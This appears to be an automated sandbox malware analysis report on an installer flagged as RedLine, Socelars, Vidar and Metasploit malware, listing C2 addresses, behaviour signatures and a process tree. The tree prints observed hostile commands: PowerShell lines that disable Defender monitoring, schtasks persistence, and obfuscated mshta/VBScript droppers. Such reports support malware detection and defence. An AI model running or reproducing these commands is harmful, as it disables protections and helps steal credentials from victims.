Analysis
-
max time kernel
320s -
max time network
1849s -
platform
windows11_x64 -
resource
win11 -
submitted
18-11-2021 14:06
General
-
Target
setup_x86_x64_install.exe
-
Size
10.5MB
-
MD5
b70883d05d292eeba3f756730a7d62bb
-
SHA1
301bc3e6004f421ed035d9f4091ebce6fc789660
-
SHA256
e8c56bc5bf674b494dd03d856c03c1ecfaf70e578c09f634cf66b09534f05c02
-
SHA512
83687a8f862f2448f1b3fdbd3523248baa1a614598ba7389d79a9c8c5debdea4bef97a048481b43a1f13cea28b73ba18f5b38775772629c253454588828128e6
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.gianninidesign.com/
Extracted
Family
redline
Botnet
media18plus
C2
91.121.67.60:51630
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 18 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
Drops file in Program Files directory 11 IoCs
-
Drops file in Windows directory 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 55 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 6 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1FPS8FyOPkmM3Jgu9Ybc4Q.0.21⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu13e7fdac52793516f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu13e7fdac52793516f.exeThu13e7fdac52793516f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\0kAFG6Gb0qZcLRAssa3HEQSW.exe"C:\Users\Admin\Pictures\Adobe Films\0kAFG6Gb0qZcLRAssa3HEQSW.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\F1urGyB1VL0Ad85vTpMHfs9Q.exe"C:\Users\Admin\Pictures\Adobe Films\F1urGyB1VL0Ad85vTpMHfs9Q.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\hkrn8zol2NQwEcEiGW9lzkvQ.exe"C:\Users\Admin\Pictures\Adobe Films\hkrn8zol2NQwEcEiGW9lzkvQ.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\vD4jlVp3UdWH6EHhvBtubC0C.exe"C:\Users\Admin\Documents\vD4jlVp3UdWH6EHhvBtubC0C.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Executes dropped EXE
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"C:\Users\Admin\Pictures\Adobe Films\sghartv8e9qtyqUcfKQujwya.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\winlogson.exe"C:\Users\Admin\AppData\Local\Temp\winlogson.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\EZetOP9i3zgHCVJL2BPdwiFu.exe"C:\Users\Admin\Pictures\Adobe Films\EZetOP9i3zgHCVJL2BPdwiFu.exe"6⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 18248⤵
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZbU91MVagd34sdG4Rbt_5065.exe"C:\Users\Admin\Pictures\Adobe Films\ZbU91MVagd34sdG4Rbt_5065.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\p23DUeCJT8KlEQ6CGhlNw6C7.exe"C:\Users\Admin\Pictures\Adobe Films\p23DUeCJT8KlEQ6CGhlNw6C7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\dg1VTPLek6Cdu2W3YLkBGjIW.exe"C:\Users\Admin\Pictures\Adobe Films\dg1VTPLek6Cdu2W3YLkBGjIW.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\_qpBu0zIOrE_TG7iNbTAc9hh.exe"C:\Users\Admin\Pictures\Adobe Films\_qpBu0zIOrE_TG7iNbTAc9hh.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\fRnyy_CSOjl8akfKb_oG3Szx.exe"C:\Users\Admin\Pictures\Adobe Films\fRnyy_CSOjl8akfKb_oG3Szx.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\E8DiPYyBvHk2yBAI40qJ_ufz.exe"C:\Users\Admin\Pictures\Adobe Films\E8DiPYyBvHk2yBAI40qJ_ufz.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 5647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\yqeRwMlYr7iIiWzJP7pXteqQ.exe"C:\Users\Admin\Pictures\Adobe Films\yqeRwMlYr7iIiWzJP7pXteqQ.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7104 -s 2887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\pDSfpWvMOdXLnHF5CBPs8ddZ.exe"C:\Users\Admin\Pictures\Adobe Films\pDSfpWvMOdXLnHF5CBPs8ddZ.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\RiqdOtex9K5R7lgsfgaIEEDx.exe"C:\Users\Admin\Pictures\Adobe Films\RiqdOtex9K5R7lgsfgaIEEDx.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 2927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\tYdyN5ueoppYS4GrWPmDQ0Dj.exe"C:\Users\Admin\Pictures\Adobe Films\tYdyN5ueoppYS4GrWPmDQ0Dj.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\4532497.exe"C:\Users\Admin\AppData\Roaming\4532497.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4072032.exe"C:\Users\Admin\AppData\Roaming\4072032.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8062743.exe"C:\Users\Admin\AppData\Roaming\8062743.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8602699.exe"C:\Users\Admin\AppData\Roaming\8602699.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3250216.exe"C:\Users\Admin\AppData\Roaming\3250216.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8171918.exe"C:\Users\Admin\AppData\Roaming\8171918.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\6567327.exe"C:\Users\Admin\AppData\Roaming\6567327.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Roaming\6567327.exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If """" == """" for %P in ( ""C:\Users\Admin\AppData\Roaming\6567327.exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Roaming\6567327.exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "" == "" for %P in ( "C:\Users\Admin\AppData\Roaming\6567327.exe") do taskkill -F /IM "%~nxP"10⤵
-
C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPT: ClOSe ( CREAteOBJeCT ( "wScript.SHELl" ). ruN ( "cMD.Exe /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If ""-p1MldDG_NCbaD4X "" == """" for %P in ( ""C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe"") do taskkill -F /IM ""%~nxP"" " , 0 , trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe" ..\5ERbq~WXXVZJ.Exe && starT ..\5ERBq~WXXVZJ.exE -p1MldDG_NCbaD4X & If "-p1MldDG_NCbaD4X " == "" for %P in ( "C:\Users\Admin\AppData\Local\Temp\5ERbq~WXXVZJ.Exe") do taskkill -F /IM "%~nxP"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE ( creATEoBJEct ( "wscRIPT.SHEll" ). RuN ( "CMD.EXE /C ecHo | sET /P = ""MZ"" > mVDFV.Y & cOPY /B /Y MvDFV.y + ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo " , 0 , TRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ecHo | sET /P = "MZ" > mVDFV.Y & cOPY /B /Y MvDFV.y+ ET4TqB.Z_p + YnUsc8.EO ..\FF7K4.SIO & DEl /Q *& stARt msiexec.exe -Y ..\Ff7k4.sIo13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>mVDFV.Y"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\Ff7k4.sIo14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /IM "6567327.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\598006.exe"C:\Users\Admin\AppData\Roaming\598006.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 2889⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\6044388.exe"C:\Users\Admin\AppData\Roaming\6044388.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"C:\Users\Admin\Pictures\Adobe Films\BNNSqUTSmvqfjeBCDyu9kFjB.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\mOCdpbqgrcbt7VF4ohjxHQVQ.exe"C:\Users\Admin\Pictures\Adobe Films\mOCdpbqgrcbt7VF4ohjxHQVQ.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 2927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"C:\Users\Admin\Pictures\Adobe Films\WXvYcKCIlYSmzJ6lXgOg7s8q.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\tY4aYIHt9E5KpidGaW_SQVpC.exe"C:\Users\Admin\Pictures\Adobe Films\tY4aYIHt9E5KpidGaW_SQVpC.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\OXlf_8JgmneEN4KvS6QqMNuO.exe"C:\Users\Admin\Pictures\Adobe Films\OXlf_8JgmneEN4KvS6QqMNuO.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\neiner.exe"C:\Users\Admin\AppData\Local\Temp\neiner.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 5409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 5529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\clepper.exe"C:\Users\Admin\AppData\Local\Temp\clepper.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe"C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6580 -s 5729⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 5567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\4lvGstGayynqkqb874rBO526.exe"C:\Users\Admin\Pictures\Adobe Films\4lvGstGayynqkqb874rBO526.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 17327⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-I3SG1.tmp\briKVPtFav5srEMmUPR7iz7u.tmp"C:\Users\Admin\AppData\Local\Temp\is-I3SG1.tmp\briKVPtFav5srEMmUPR7iz7u.tmp" /SL5="$601F6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\briKVPtFav5srEMmUPR7iz7u.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-DP7V9.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-DP7V9.tmp\lakazet.exe" /S /UID=27098⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\af-bacd3-f4b-47b83-40850e39cdbf2\Rakiqosuvy.exe"C:\Users\Admin\AppData\Local\Temp\af-bacd3-f4b-47b83-40850e39cdbf2\Rakiqosuvy.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd53cb46f8,0x7ffd53cb4708,0x7ffd53cb471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:211⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:811⤵
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,1596619438368246891,5513377658133110605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5668 /prefetch:811⤵
-
